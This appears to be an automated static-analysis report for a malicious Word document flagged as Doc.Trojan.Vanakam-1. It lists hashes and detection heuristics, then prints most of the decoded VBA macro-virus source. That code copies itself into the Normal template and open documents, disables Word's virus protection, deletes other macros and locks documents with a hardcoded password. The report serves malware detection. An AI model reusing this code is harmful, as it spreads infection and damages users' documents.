Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f19c24ef6368231…

MALICIOUS

Office (OLE)

45.0 KB Created: 2000-04-19 04:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1b75cbba2467f850c9ca30fea304bcfe SHA-1: 21e1c54cdc8161b161b83877cf0e51cae29bdccc SHA-256: 5f19c24ef6368231d8abe15db1d4b0105c3da7af87eb85bfb51004490aeec2da
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy macro virus, with both WordBasic and VBA macros detected. The presence of AutoOpen and Auto_Close macros, along with legacy WordBasic markers, suggests an attempt to infect other documents. The ClamAV detection as 'Doc.Trojan.Vanakam-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Vanakam-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Vanakam-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7433 bytes
SHA-256: 67aca8a8677c05fe78595dee4ffd90ba62a4179acc040583ea49a561b888c526
Detection
ClamAV: Doc.Trojan.Vanakam-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "MalaysianIndian"
Public sfile, dfile, MacroActive As Variant
Public infected, KillMacro, ReturnValue, foundDot, foundDoc As Boolean
Public myVirus(2) As String
Dim errormsg
Function MacroTrue()
    WordBasic.disableautomacros True
End Function
Function MacroFalse()
    WordBasic.disableautomacros False
End Function
Function AssignCode()
    myVirus(0) = "MalaysianIndian"
    myVirus(1) = "Indian"
    myVirus(2) = "IndianMsg"
End Function

Sub TransferMacro(SourceFile, DestinationFile)
    Dim TempMacro
    For Each TempMacro In myVirus
       Application.OrganizerCopy SourceFile.FullName, DestinationFile.FullName, TempMacro, 3
    Next TempMacro
End Sub

Function GetFile()
    MacroActive = MacroContainer
    Set dfile = ActiveDocument
    Set sfile = NormalTemplate
    
    If MacroActive = dfile Then
        Set sfile = dfile
        Set dfile = NormalTemplate
    Else
        Set sfile = NormalTemplate
        Set dfile = ActiveDocument
    End If
End Function

Function InsertFootNote()
    If ActiveDocument.ProtectionType = wdNoProtection Then
      With ActiveDocument.Sections(1)
        .Headers(wdHeaderFooterPrimary).Range.Text = "Indian 2000"
        .Footers(wdHeaderFooterPrimary).Range.Text = "Indian The Best"
      End With
    End If
End Function

Function CheckInfection(NeedFile) As Boolean
    Dim mv
    Dim Md
    
    For Each Md In NeedFile.VBProject.VBComponents
    If Md.Name <> "ThisDocument" And Md.Name <> "MalaysianIndian" And Md.Name <> "Indian" And Md.Name <> "IndianMsg" Then
       Application.OrganizerDelete NeedFile.FullName, Md.Name, 3
    End If
    Next Md
    
   For Each mv In NeedFile.VBProject.VBComponents
     If mv.Name = "MalaysianIndian" Then
       CheckInfection = True
       Exit Function
     End If
     If mv.Name <> "MalaysianIndian" Then
       CheckInfection = False
     End If
    Next mv
End Function
Function UnprotectDocument()
    If ActiveDocument.ProtectionType <> wdNoProtection Then
        ActiveDocument.Unprotect Password:="pascalline"
    End If
End Function
Function ProtectDocument()
    If ActiveDocument.ProtectionType = wdNoProtection Then
        WordBasic.ToolsProtectDocument DocumentPassword:="pascalline", NoReset:=1, Type:=1
    End If
End Function
Function InfectDeinfect(SourceDoc, DestinationDoc)
   AssignCode
   ReturnValue = CheckInfection(DestinationDoc)
   If ReturnValue <> True Then
      TransferMacro SourceDoc, DestinationDoc
   End If
End Function

Sub AutoNew()
On Error GoTo StopAutoNew
    InsertFootNote
StopAutoNew:
End Sub

Sub AutoClose()
On Error GoTo StopAutoClose
    Dim aClose
    Application.DisplayAlerts = -1
    Options.VirusProtection = False
    GetFile
    aClose = InfectDeinfect(sfile, dfile)
    If ActiveDocument.ReadOnly = False Then
        ProtectDocument
        WordBasic.FileSaveAs Format:=1
    End If
StopAutoClose:
End Sub
Sub AutoOpen()
On Error GoTo StopAutoOpen
    Dim aOpen
    GetFile
    aOpen = CheckInfection(sfile)
    If ActiveDocument.ProtectionType = wdNoProtection Then
        InsertFootNote
    End If
StopAutoOpen:
End Sub

Sub AutoExit()
On Error GoTo StopAutoExit
    Dim SearchObj As Object
    foundDot = False
    For Each SearchObj In AddIns
        If SearchObj.Name = "IndianTheBest.dot" Then foundDot = True
    Next SearchObj
    
    If foundDot <> True Then
        Application.Visible = False
        Documents.Add
        GetFile
        aClose = InfectDeinfect(sfile, dfile)
        With ActiveDocument
                .SaveAs FileName:=Options.DefaultFilePath(8) & "\IndianTheBest.src", fileformat:=wdFormatDocument, AddtoRecentFiles:=False
                .SaveAs FileName:=Options.DefaultFilePat
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.